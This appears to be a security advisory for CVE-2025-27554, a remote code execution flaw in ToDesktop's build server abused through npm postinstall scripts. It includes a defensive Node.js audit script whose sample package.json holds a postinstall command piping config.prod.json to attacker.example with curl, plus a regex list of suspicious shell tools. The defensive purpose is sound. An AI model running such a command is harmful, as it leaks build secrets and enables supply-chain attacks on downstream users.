Platform
nodejs
Component
todesktop
Fixed in
2024.0.1
CVE-2025-27554 is a critical remote code execution (RCE) vulnerability in ToDesktop, a Node.js package used by Cursor and other desktop applications. It lets an attacker execute arbitrary commands on the ToDesktop build server, which can lead to unauthorized access and data exposure. It affects ToDesktop versions before 2024-10-03 and is fixed in version 2024-10-03.
The primary impact of CVE-2025-27554 is that a remote attacker can run arbitrary commands on the build server. The vector is a malicious postinstall script in package.json, which npm executes automatically while the build server installs the project's dependencies. A successful exploit lets the attacker read sensitive data on that server, such as the secrets stored in the desktopify config.prod.json file. Those secrets could then be used to push malicious updates to applications built with ToDesktop, giving the attacker control over the deployment pipeline. The blast radius therefore extends to every application built with a vulnerable version of ToDesktop and, through their update channels, to that application's users.
CVE-2025-27554 was publicly disclosed on 2025-03-01. No active exploitation had been reported at the time of writing, but the CRITICAL severity and the low skill needed to exploit it (a script in a package.json) make future attacks likely. The vulnerability is not currently listed in the CISA KEV catalog. Public proof-of-concept code is likely to appear given the vulnerability's nature.
Applications built with the ToDesktop Node.js package are at risk, particularly those with automated build and deployment pipelines. Projects that depend on Cursor or on other applications that transitively depend on ToDesktop are also exposed. Shared environments in which several projects are built on the same server are especially susceptible, because a postinstall script from one project runs with access to the others' files.
• nodejs / supply-chain: npm ls todesktop
• nodejs / supply-chain: grep -n '"postinstall"' package.json
• nodejs / supply-chain: find . -name 'desktopify config.prod.json' -print
Exploit Status
EPSS
0.43% (63rd percentile)
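The three checks above can be combined into one script that a build server or a CI job runs against a project before installing its dependencies. The following Node.js script is an added example, not code from ToDesktop, Cursor or this advisory: it lists every lifecycle script that npm would run at install time, flags the ones that fetch, pipe or read a config.prod.json file (the pattern this CVE abuses), and compares the declared todesktop version with the fixed release. It assumes the dependency is named todesktop and that its versions are ISO date strings of the form YYYY-MM-DD, as this advisory presents them; the sample package.json, its file path and the attacker hostname are constructed for the example.

```javascript
// Added example (not ToDesktop's or Cursor's code): audit a package.json for
// install-time lifecycle scripts, the vector abused by CVE-2025-27554, and
// check the declared todesktop version against the fixed release.
// Assumptions: the dependency is named "todesktop" and its versions are
// ISO date strings "YYYY-MM-DD" as the advisory presents them.

// npm runs these scripts automatically during `npm install` / `npm ci`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Commands that download, pipe into a shell, spawn processes or touch the
// ToDesktop secrets file deserve a human look before the build proceeds.
const SUSPICIOUS = [
  /\bcurl\b/, /\bwget\b/, /\|\s*(ba)?sh\b/, /\bbase64\b/,
  /child_process/, /config\.prod\.json/, /\.\.\//,
];

// Returns [{hook, command, suspicious}] for every install-time script.
function findInstallScripts(pkgJsonText) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({
      hook,
      command: scripts[hook],
      suspicious: SUSPICIOUS.some((re) => re.test(scripts[hook])),
    }));
}

// true  -> todesktop is declared with a version older than fixedVersion
// false -> not a dependency, or already at/after the fixed version
// null  -> declared with a version scheme this check does not understand
function todesktopIsVulnerable(pkgJsonText, fixedVersion = "2024-10-03") {
  const pkg = JSON.parse(pkgJsonText);
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  const spec = deps.todesktop;
  if (spec === undefined) return false;
  const m = spec.match(/(\d{4}-\d{2}-\d{2})/);   // drop range prefixes like ^ or ~
  if (!m) return null;
  return m[1] < fixedVersion;                     // ISO dates compare lexically
}

// Constructed sample mimicking the abuse the advisory describes. The path and
// the attacker host are hypothetical.
const SAMPLE_PKG = JSON.stringify({
  name: "victim-app",
  scripts: {
    build: "todesktop build",
    postinstall:
      "cat ../desktopify/config.prod.json | curl -s -X POST -d @- https://attacker.example/collect",
  },
  devDependencies: { todesktop: "^2024-09-01" },
});

// Audit one package.json text and return a compact report object.
function audit(pkgJsonText) {
  const hooks = findInstallScripts(pkgJsonText);
  return {
    hooks,
    flagged: hooks.filter((h) => h.suspicious).length,
    vulnerableVersion: todesktopIsVulnerable(pkgJsonText),
  };
}

// Usage: node audit-todesktop.js [path/to/package.json]; defaults to the sample.
if (typeof require !== "undefined" && require.main === module) {
  const file = process.argv[2];
  const text = file ? require("node:fs").readFileSync(file, "utf8") : SAMPLE_PKG;
  const report = audit(text);
  for (const h of report.hooks) {
    console.log(`${h.suspicious ? "SUSPICIOUS" : "review    "} ${h.hook}: ${h.command}`);
  }
  console.log("todesktop below fixed version:", report.vulnerableVersion);
  process.exitCode = report.flagged > 0 || report.vulnerableVersion === true ? 1 : 0;
}
```

Run it before dependency installation and, on a shared build server, combine it with `npm ci --ignore-scripts` so that no lifecycle script runs at all unless a reviewer has approved it. The regex list is deliberately simple; treat a hit as a prompt for manual review, not as proof of compromise, and treat a `null` version result as a reason to check the lockfile by hand.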
The primary mitigation for CVE-2025-27554 is to upgrade ToDesktop to version 2024-10-03 or later immediately. If an upgrade is not immediately feasible because of compatibility issues or breaking changes, restrict access to the build server in the meantime and review every package.json that reaches it for install-time scripts. Add stricter access controls and auditing on the build server so that unexpected command execution is detected and blocked. Review the desktopify config.prod.json file and make sure its secrets are not readable by build jobs or other unauthorized users; rotate any secret that a vulnerable build may have exposed. After upgrading, confirm the installed version with npm ls todesktop and check that package.json contains no postinstall script you do not recognise.
Update the 'todesktop' dependency to a version later than 2024-10-02. This prevents remote command execution on the build server via the postinstall script in package.json. See the ToDesktop blog for more information about the vulnerability and the security measures that were implemented.
CVE-2025-27554 is a critical remote code execution vulnerability in ToDesktop versions before 2024-10-03. It allows attackers to execute commands on the build server, potentially accessing sensitive data.
You are affected if you build applications with a ToDesktop version prior to 2024-10-03, or if you use Cursor or another application that was built with a vulnerable version of ToDesktop.
Upgrade ToDesktop to version 2024-10-03 or later. If immediate upgrade is not possible, restrict build server access and review installed packages.
No active exploitation has been reported, but the vulnerability's severity suggests a high probability of future attacks.
Refer to the relevant security advisories from the ToDesktop project and any dependent applications like Cursor for detailed information and updates.